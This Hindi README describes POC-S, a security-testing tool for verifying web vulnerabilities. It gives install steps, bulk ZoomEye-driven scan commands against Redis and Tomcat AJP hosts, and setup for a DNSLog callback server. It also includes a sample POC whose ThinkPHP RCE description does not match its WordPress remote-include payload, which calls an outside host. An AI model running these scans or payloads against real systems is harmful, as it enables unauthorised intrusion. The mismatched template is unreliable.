
POC-T का सशक्त संस्करण POC-S, जो रेड-ब्लू टीम अभ्यास में वेब एप्लिकेशन कमजोरियों के त्वरित सत्यापन के लिए उपयोग किया जाता है। इसमें कार्यक्षमता को बढ़ाया गया है तथा स्क्रिप्ट को वर्गीकृत करके जोड़ा गया है, साथ ही इसमें अंतर्निहित dnslog आदि सुविधाएँ शामिल हैं। यह प्लेटफ़ॉर्म vulhub टारगेट मशीनों और अन्य ओपन-सोर्स परियोजनाओं से उच्च-उपलब्धता वाले POC भी प्रदान करता है।
POC-T का wiki दस्तावेज़ doc निर्देशिका में देखें
प्रस्तावना: वर्तमान में
पूर्व द्विपक्षीय सहमति के बिना, POC-S का उपयोग करके लक्ष्य पर हमला करना अवैध है। POC-S केवल सुरक्षा परीक्षण उद्देश्यों के लिए है
TODO
चूंकि तृतीय-पक्ष इंटरफ़ेस को प्रमाणीकरण की आवश्यकता है, आप --init पैरामीटर के माध्यम से अपने संबंधित इंटरफ़ेस कॉन्फ़िगरेशन को आरंभ कर सकते हैं, उदा: --init zoomeye
pip install pocs
स्रोत कोड से स्थापित करें:
git clone https://github.com/jiangsir404/POC-S.git
mv pocs/toolkit.conf.bak mv pocs/toolkit.conf
python setup.py install
यदि pip install pocs में Some files missing त्रुटि आती है, तो pocs की स्थापना निर्देशिका (python2.7\Lib\site-packages\pocs) पर जाएँ और tookit.conf का नाम बदलें। यदि
WARNING: Generating metadata for package cachetools produced metadata for project name unknown. Fix your #egg=cachetools fragments.त्रुटि आती है, तो यह पैकेज निर्भरता की समस्या है। कृपया निम्नलिखित पैकेज संस्करणों की जाँच करें और अद्यतन करें: setuptools==39.0.1 cachetools==3.1.1 google-api-python-client==1.7.11
pocs -s test/test2.py -iS 127.0.0.1 # script/test/test2.py स्क्रिप्ट लोड करें
pocs -s test2 -iS 127.0.0.1 # script/test2.py स्क्रिप्ट लोड करें
pocs -b test -iS 127.0.0.1 # /script/test निर्देशिका की सभी स्क्रिप्ट को बैच में लोड करें
pocs -b test -s test2.py -iS 127.0.0.1 # script/test/test2.py स्क्रिप्ट लोड करें
pocs -s myself_script.py -iS 127.0.0.1 # कस्टम स्क्रिप्ट और स्क्रिप्ट निर्देशिका लोड करें
pocs -b mydir -iS 127.0.0.1
pocs --init zoomeye // zoomeye की कॉन्फ़िगरेशन जानकारी आरंभ करें
pocs -b redis -t 50 -aZ "port:6379" --limit 50 -o res.txt
pocs -s test2.py -aZ "ThinkPHP"
ZoomEye का उपयोग करके बैच में CNVD-2020-10487 tomcat ajp lfi भेद्यता खोजें
pip install pocs
pocs -b apache -aZ "app:tomcat" --limit 50 -t 30 -o ajp.txt

यदि आप अभी भी ceye की अस्थिरता से परेशान हैं, और DNSLog प्लेटफ़ॉर्म बनाने के लिए समय और ऊर्जा नहीं है (दो डोमेन, एक सार्वजनिक IP की आवश्यकता है, और डोमेन के DNS सर्वर को संशोधित करने में सक्षम होना चाहिए) तो क्यों न POC-S द्वारा प्रदान किए गए सरल DNSLog प्लेटफ़ॉर्म को आज़माएँ, केवल एक डोमेन और एक सार्वजनिक IP की आवश्यकता है, सत्यापन के लिए API इंटरफ़ेस प्रदान करता है (कोई इंटरफ़ेस नहीं)
मान लीजिए dnslog.xxx.cn आपका सार्वजनिक डोमेन है, x.x.x.x सार्वजनिक IP है, सुनिश्चित करें कि dnslog.xxx.cn सामान्य रूप से x.x.x.x पर हल हो सके, अन्यथा API तक सामान्य रूप से पहुँचा नहीं जा सकता सार्वजनिक IP (x.x.x.x) पर कमांड चलाएँ:
pip install pocs
pocs_dnslog -h 0.0.0.0 -p 88 (यदि pip से स्थापित नहीं किया गया है, तो सीधे pocs.dnslog.py स्क्रिप्ट चलाएँ)
>>> dns domain: dnslog.xxx.cn
>>> api key: rivir
>>>dns ip: x.x.x.x
dns log कमांड, केवल nslookup कमांड का समर्थन करता है: nslookup 1234.dnslog.xxx.cn x.x.x.x
यदि आप ping 1234.dnslog.xxx.cn कमांड का उपयोग करना चाहते हैं, तो आप xxx.cn डोमेन के लिए कस्टम DNS सर्वर भी कॉन्फ़िगर कर सकते हैं (DNSLog कॉन्फ़िगरेशन देखें)
web log कमांड: curl http://dnslog.xxx.cn:88/weblog/poc123
API इंटरफ़ेस पता: http://x.x.x.x:88/api/?token={token}&type={dns}&filter=1234.dnslog.xxx.cn
पैरामीटर:
- token अनिवार्य, DNSLog स्थापित करते समय दर्ज किया गया api_key
- type अनिवार्य, वैकल्पिक मान: dns/web
- filter वैकल्पिक, रिकॉर्ड फ़िल्टर करें, पूर्ण मिलान
pocs अधिक लचीला प्लगइन वर्गीकरण विधि प्रदान करता है, वर्तमान में चार प्रकार के POC एकत्र किए गए हैं: Fuzz POC, OWASP POC, Vuln POC, Tool POC. POC अनुभाग में, हम github पर पहले से मौजूद कुछ POC एकत्र करने का प्रयास करेंगे, लेकिन बहुत अधिक नहीं, फिर भी व्यक्तिगत रूप से एकत्र और व्यवस्थित करने की आवश्यकता है।
POC लेखन जितना संभव हो उतना मानकीकृत होगा, POC-T की लेखन शैली का पालन करेगा। उदाहरण निम्नलिखित है
#!/usr/bin/env python
#coding:utf-8
"""
ThinkPHP5 <=5.0.22/<=5.1.29 रिमोट कोड एक्ज़ीक्यूशन भेद्यता
विवरण
2018 दिसंबर 10 दोपहर, thinkphp आधिकारिक सार्वजनिक खाते ने एक अद्यतन सूचना प्रकाशित की, जिसमें 5.x श्रृंखला के सभी संस्करणों में एक उच्च जोखिम वाली भेद्यता शामिल है जो getshell की अनुमति देती है।
फ्रेमवर्क द्वारा कंट्रोलर नाम का पर्याप्त निरीक्षण न करने के कारण, अनिवार्य रूटिंग को सक्षम किए बिना संभावित getshell भेद्यता हो सकती है,
प्रभावित संस्करणों में 5.0.23 और 5.1.31 से पहले के सभी संस्करण शामिल हैं, नवीनतम संस्करण में जितनी जल्दी हो सके अद्यतन करने की अनुशंसा की जाती है।
संस्करण
ThinkPHP5.0 संस्करण <= 5.0.22 ThinkPHP5.1 संस्करण <= 5.1.29
उपयोग:
1. python POC-S.py -s
2. POC: /wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://lj.s7star.cn/info.txt
संदर्भ
https://www.seebug.org/vuldb/ssvid-9771
"""
import requests
def poc(url):
pass
मुख्य रूप से vulhub प्लगइन लेखन और POC-T के साथ आने वाले प्लगइन poc से आता है, केवल कुछ उच्च-उपलब्धता वाले POC जोड़ता है नीचे सूचीबद्ध प्रत्येक POC मूल रूप से स्वयं पर्यावरण स्थापित करके एक-एक करके सत्यापित किया गया है और उपयोग योग्य है, यदि कोई त्रुटिपूर्ण POC है, तो कृपया issues के माध्यम से मुझसे संपर्क करें।
स्रोत: boy-hack/POC-T
स्रोत: hunter का पता लगाने वाली स्क्रिप्ट
कुछ सामान्य टूल श्रेणी के POC, खोज इंजन, सूचना क्वेरी आदि कार्य प्रदान करते हैं
अन्य ओपन-सोर्स POC जैसे https://github.com/boy-hack/airbug प्रोजेक्ट ने कुछ POC एकत्र किए हैं जिनका सीधे उपयोग किया जा सकता है, लेकिन एक HackReqeust लाइब्रेरी है जो py3 के लिए है, इसे Python2 में बदलने की आवश्यकता है, मेरे द्वारा संशोधित py2 लाइब्रेरी को सीधे स्थापित किया जा सकता है: https://github.com/jiangsir404/hack-requests